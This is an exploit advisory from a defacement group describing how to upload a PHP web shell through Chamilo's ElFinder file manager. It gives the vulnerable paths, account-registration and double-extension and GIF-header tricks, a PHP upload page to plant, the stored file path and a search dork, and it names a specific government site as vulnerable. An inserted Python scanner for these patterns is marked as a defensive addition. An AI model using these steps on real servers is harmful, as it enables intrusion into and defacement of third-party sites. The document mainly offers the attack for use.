####################################################################
# Exploit Title : Chamilo © 2020 Campus v1 ElFinder Backdoor Access Shell Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 27 May 2020
# Vendor Homepage : campus.chamilo.org
# Software Version : 1 and 1.x.x etc...
# Software Download Link : chamilo.org/en/download/
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : Powered by Chamilo © 2020 site:com
# Vulnerability Type :
CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
CWE-264 Permissions, Privileges, and Access Controls
CAPEC-650 [ Upload a Web Shell to a Web Server ]
CAPEC-17 [ Using Malicious Files ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/KingSkrupellos
# Zone-H : zone-h.org/archive/notifier=KingSkrupellos
#          zone-h.org/archive/notifier=CyBeRiZM
# Mirror-H : mirror-h.org/search/hacker/948/
#            mirror-h.org/search/hacker/94/
#            mirror-h.org/search/hacker/1826/
# Defacer.ID : defacer.id/archive/attacker/KingSkrupellos
#              defacer.id/archive/team/Cyberizm-Org
# Inj3ctor : 1nj3ctor.com/attacker/43/ ~ 1nj3ctor.com/attacker/59/
# Aljyyosh : aljyyosh.org/hacker.php?id=KingSkrupellos
#            aljyyosh.org/hacker.php?id=Cyberizm.Org
#            aljyyosh.org/hacker.php?id=Cyberizm
# Zone-D : zone-d.org/attacker/id/69
# Pastebin : pastebin.com/u/KingSkrupellos
# Cyberizm.Org : cyberizm.org/forum-exploits-vulnerabilities
####################################################################
# Impact :
***********
This Software is prone to a vulnerability that lets attackers
upload arbitrary files because it fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and execute
it in the context of the webserver process. This may facilitate unauthorized access
or privilege escalation; other attacks are also possible.
CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
*********************************************************
The software allows the attacker to upload or transfer files of dangerous types that
can be automatically processed within the product's environment.
CWE-264 Permissions, Privileges, and Access Controls
****************************************************
Weaknesses in this category are related to the management of
permissions, privileges, and other security features that are used
to perform access control.
CAPEC-650 [ Upload a Web Shell to a Web Server ]
*********************************************************
By exploiting insufficient permissions, it is possible to upload a web shell to a web server in
such a way that it can be executed remotely. This shell can have various capabilities, thereby acting
as a "gateway" to the underlying web server. The shell might execute at the higher permission level
of the web server, providing the ability to execute malicious code at elevated levels.
CAPEC-17 [ Using Malicious Files ]
*******************************
An attack of this type exploits a system's configuration that allows an attacker to either directly
access an executable file, for example through shell access; or in a possible worst case allows
an attacker to upload a file and then execute it. Web servers, ftp servers, and message oriented
middleware systems which have many integration points are particularly vulnerable, because
both the programmers and the administrators must be in sync regarding the interfaces
and the correct privileges for each interface.
####################################################################
# Arbitrary File Upload / Unauthorized File Insert Exploit :
**************************************************
/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en
/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw
Important Note : Ministry of Commerce Industry and Tourism Colombia [ mincit.gov.co ] is vulnerable.
If it says to you :
Unable to connect to backend.
Invalid backend configuration.
Readable volumes not available.
Then register yourself with an Admin or Author account :
/main/auth/inscription.php
Then you can use File Upload and shell the sites with .php.gif or php.pjpg
Use your Brain :)
Vulnerability Screenshot Proof =>
https://www.upload.ee/image/11775401/mincitgovcoexploitelfinder27520.png
https://www.upload.ee/image/11775402/elfinderexploit27052020.png
Upload your shell in GIF format and then rename the extension.
# If the rename function is disabled, add this GIF89;aGIF89;aGIF89;a before <?PHP
# Example
GIF89;aGIF89;aGIF89;a<html>
<head>
<title>PHP Test</title>
<form action="" method="post" enctype="multipart/form-data">
<input type="file" name="fileToUpload" id="fileToUpload">
<input type="submit" value="upload file" name="submit">
</form>
</head>
<body>
<?php echo '<p>FILE UPLOAD</p><br>';
$tgt_dir = "uploads/";
$tgt_file = $tgt_dir.basename($_FILES['fileToUpload']['name']);
echo "<br>TARGET FILE= ".$tgt_file;
//$filename = $_FILES['fileToUpload']['name'];
echo "<br>FILE NAME FROM VARIABLE:- ".$_FILES["fileToUpload"]["name"];
if(isset($_POST['submit']))
{
if(file_exists("uploads/".$_FILES["fileToUpload"]["name"]))
{ echo "<br>file exists, try with another name"; }
else {
echo "<br>STARTING UPLOAD PROCESS<br>";
if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"],
$tgt_file))
{ echo "<br>File UPLOADED:- ".$tgt_file; }
else { echo "<br>ERROR WHILE UPLOADING FILE<br>"; }
}
}
?>
</body>
</html>
Directory File Path :
**********************
/app/upload/users/[ID-NUMBER]/[YOUR-NUMBER-ID]/my_files/[YOURFILENAME].html
[PATH]/my_files/[YOURFILENAME].html
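As an added defender-side example that is not part of this advisory: a Python scan for the two upload patterns described above, the .php.gif / php.pjpg double extension and the GIF-header-then-<?PHP polyglot that the file manager stores as an image or HTML file. It runs against a constructed directory tree laid out like the Directory File Path above; the file names, contents and the users/1/1 path segments are constructed for the demo, not taken from any real installation.

```python
import os
import re
import tempfile

PHP_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}  # run by the PHP handler
PASSIVE_EXTS = {"gif", "jpg", "jpeg", "pjpg", "png", "html", "htm", "txt"}  # served as content
PHP_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)  # PHP open tags in any case

def suspicious_name(filename: str) -> bool:
    """Flag a PHP extension anywhere after the first segment (shell.php.gif, x.pjpg.php)."""
    parts = filename.lower().split(".")
    return any(p in PHP_EXTS for p in parts[1:])

def suspicious_content(filename: str, data: bytes) -> bool:
    """Flag a passive extension whose bytes carry a PHP open tag (a polyglot)."""
    ext = filename.lower().rsplit(".", 1)[-1]
    return ext in PASSIVE_EXTS and PHP_TAG.search(data) is not None

def scan_tree(root: str, max_bytes: int = 2_000_000) -> list[tuple[str, str]]:
    """Return (path relative to root, reason) for every flagged file under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if suspicious_name(name):
                findings.append((rel, "double-extension"))
                continue
            with open(path, "rb") as fh:  # read a bounded prefix; a dropped shell is small
                data = fh.read(max_bytes)
            if suspicious_content(name, data):
                findings.append((rel, "php-tag-in-passive-file"))
    return sorted(findings)

def demo() -> list[tuple[str, str]]:
    """Constructed tree shaped like app/upload/users/<id>/<id>/my_files/ (assumed layout)."""
    root = tempfile.mkdtemp()
    my_files = os.path.join(root, "users", "1", "1", "my_files")
    os.makedirs(my_files)
    samples = {  # constructed sample contents, not real uploads
        "avatar.gif": b"GIF89a\x01\x00\x01\x00",  # genuine image header, benign
        "poly.html": b"GIF89;aGIF89;aGIF89;a<html><?php echo 'x'; ?>",  # header trick from the text
        "shell.php.gif": b"GIF89a<?php echo 'x'; ?>",  # double-extension trick from the text
    }
    for name, data in samples.items():
        with open(os.path.join(my_files, name), "wb") as fh:
            fh.write(data)
    return scan_tree(root)
```

Point scan_tree() at the real upload root on a suspect host; the same two checks, applied before move_uploaded_file(), are the fix on the upload side.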
####################################################################
# Example Vulnerable Sites :
************************
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################